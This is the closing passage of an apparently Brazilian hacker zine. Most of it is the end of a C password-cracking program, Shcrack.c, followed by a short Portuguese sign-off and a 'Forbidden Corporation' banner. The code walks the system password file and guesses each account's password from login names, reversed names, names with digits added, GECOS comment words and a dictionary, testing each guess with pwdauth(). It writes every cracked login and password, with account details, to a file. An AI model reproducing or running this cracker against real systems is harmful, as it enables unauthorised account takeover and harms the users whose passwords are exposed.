   case 'u':
	   logname = optarg;
	   break;

   case 'd':
	   dict = optarg;
	   break;

   default:
	   printf("wrong options\n");
	   break;
 }

find_mode();
}


/* Routine to redirect interrupts */

void disable_interrupts( void )
{
signal(SIGHUP, SIG_IGN);
 signal(SIGTSTP, cleanup);
  signal(SIGINT, cleanup);
 signal(SIGQUIT, cleanup);
signal(SIGTERM, cleanup);
}


/* If CTRL-Z or CTRL-C is pressed, clean up & quit */

void cleanup( void )
{
FILE *fp;

if ((fp = fopen("gecos", "r")) != NULL)
   remove("gecos");

if ((fp = fopen("data", "r")) == NULL)
   printf("\nNo accounts cracked\n");

printf("Quitting\n");
exit(0);
}


/* Function to decide which mode is being used and call appropriate
   routine */

void find_mode( void )
{
 if (strcmp(mode, "b") == NULL)
    burst_mode();
 else
 if (strcmp(mode, "i") == NULL)
    mini_burst();
 else
 if (strcmp(mode, "f") == NULL)
    brute_force();
 else
  {
    printf("Sorry - No such mode\n");
    exit(0);
  }
}


/* Get a users information from the password file */

void user_info( void )
{
  uid = pwentry->pw_uid;
   gid = pwentry->pw_gid;
    comment = pwentry->pw_gecos;
   homedir = pwentry->pw_dir;
  shell = pwentry->pw_shell;
}



/* Set the filename of the password file to be used, default is
   /etc/passwd */

void pwfile_name( void )
{
if (pwfile != NULL)
    setpwfile(pwfile);
}



/* Burst mode, tries user i.d. & then reverses it as possible passwords
   on every account found in the password file */

void burst_mode( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
      try_word( logname );
     reverse_word( logname );
  }

endpwent();
}


/* Mini-burst mode, try above combinations as well as other strategies
   which include adding numbers to the end of the user i.d. to generate
   passwords or using the comment field information in the password
   file */

void mini_burst( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
     word_strat();
  }

endpwent();
}


/* Brute force mode, uses all the above strategies as well using a
   dictionary file to generate possible passwords */

void brute_force( void )
{
pwfile_name();
setpwent();

  if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
     printf("Sorry - User unknown\n");
     exit(0);
  }
  else
  {
     user_info();
      word_strat();
     do_dict();
  }

endpwent();
}


/* Calls the various password guessing strategies */

void word_strat()
{
 try_word( logname );
  reverse_word( logname );
   add_nums( logname );
  do_comment( comment );
}


/* Takes the user name as its argument and then generates possible
   passwords by adding the numbers 0-9 to the end. If the username
   is greater than 7 characters, don't bother */

void add_nums( char *wd )
{
int i;
char temp[2], buff[WORDSIZE];

if (strlen(wd) < 8) {

  for (i = 0; i < 10; i++)
  {
      strcpy(buff, wd);
       sprintf(temp, "%d", i);
	strcat(wd, temp);
       try_word( wd );
      strcpy(wd, buff);
  }

 }
}



/* Gets info from the 'gecos' comment field in the password file,
   then process this information generating possible passwords from it */

void do_comment( char *wd )
{
FILE *fp;

char temp[2], buff[WORDSIZE];
int c,  flag;

flag = 0;


/* Open file & store users gecos information in it. w+ mode
   allows us to write to it & then read from it. */

if ((fp = fopen("gecos", "w+")) == NULL) {
    printf("Error writing gecos info\n");
   exit(0);
}

    fprintf(fp, "%s\n", wd);
   rewind(fp);

strcpy(buff, "");


/* Process users gecos information, separate words by checking for the
   ',' field separater or a space. */

while ((c = fgetc(fp)) != EOF)
{

 if (( c != ',' ) && ( c != ' ' )) {
     sprintf(temp, "%c", c);
    strncat(buff, temp, 1);
 }
 else
    flag = 1;


   if ((isspace(c)) || (c == ',') != NULL) {

     if (flag == 1) {
	c=fgetc(fp);

	if ((isspace(c)) || (iscntrl(c) == NULL))
	   ungetc(c, fp);
     }

     try_word(buff);
      reverse_word(buff);
       strcpy(buff, "");
      flag = 0;
     strcpy(temp, "");
   }

}
fclose(fp);
remove("gecos");
}



/* Takes a string of characters as its argument(in this case the login
   i.d., and then reverses it */

void reverse_word( char *wd )
{
char temp[2], buff[WORDSIZE];
int i;

i = strlen(wd) + 1;
 strcpy(temp, "");
strcpy(buff, "");

 do
 {
    i--;
    if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
	sprintf(temp, "%c", wd[i]);
       strncat(buff, temp, 1);
    }

 } while(i != 0);

if (strlen(buff) > 1)
   try_word(buff);
}



/* Read one word at a time from the specified dictionary for use
   as possible passwords, if dictionary filename is NULL, ignore
   this operation */

void do_dict( void )
{
FILE *fp;
char buff[WORDSIZE], temp[2];
int c;

strcpy(buff, "");
strcpy(temp, "");


if (dict == NULL)
   exit(0);

   if ((fp = fopen(dict, "r")) == NULL) {
       printf("Error opening dictionary file\n");
      exit(0);
   }

rewind(fp);


 while ((c = fgetc(fp)) != EOF)
 {
  if ((c != ' ') || (c != '\n')) {
     strcpy(temp, "");
      sprintf(temp, "%c", c);
     strncat(buff, temp, 1);
  }

  if (c == '\n') {
    if (buff[0] != ' ')
       try_word(buff);

      strcpy(buff, "");
  }
 }

fclose(fp);
}


/* Process the word to be used as a password by stripping \n from
   it if necessary, then use the pwdauth() function, with the login
   name and word to attempt to get a valid id & password */

void try_word( char pw[] )
{
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];

strcpy(buff, "");
pwlength = strlen(pw);

for (i = 0; i != pwlength; i++)
{

 if (pw[i] != '\n') {
     strcpy(temp, "");
     sprintf(temp, "%c", pw[i]);
    strncat(buff, temp, 1);
 }
}

 if (strlen(buff) > 3 ) {
     printf("Trying : %s\n", buff);

     if (pwstat = pwdauth(logname, buff) == NULL) {
	 printf("Valid Password! - writing details to 'data'\n");

	 write_details(buff);

	if (strcmp(mode, "f") == NULL)
	   exit(0);
     }
 }
}



/* If valid account & password, store this, along with the accounts
   uid, gid, comment, homedir & shell in a file called 'data' */

void write_details( char *pw )
{
FILE *fp;

if ((fp = fopen(OUTFILE, "a")) == NULL) {
    printf("Error opening output file\n");
   exit(0);
}

fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
 fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
fclose(fp);
}

--[-CORTE AQUI-]--[Shcrack.c]--------------------------------------------------------



<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Valewz galera espero que gostem do zine kker duvida sugestao ou se vc for 
um kra muito xato e ker apenas  enxer o sako dos editors e mail uz

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


                          End of transmition ...........



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++ A FC0RP ZINE E UMA PRODUCAO DA FORBIDDEN CORPORATION® +++++++++++++
++++++++++++++++  ALL RIGHTS RESERVED  CORPRIGHT ¢ ++++++++++++++++++++++++ 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
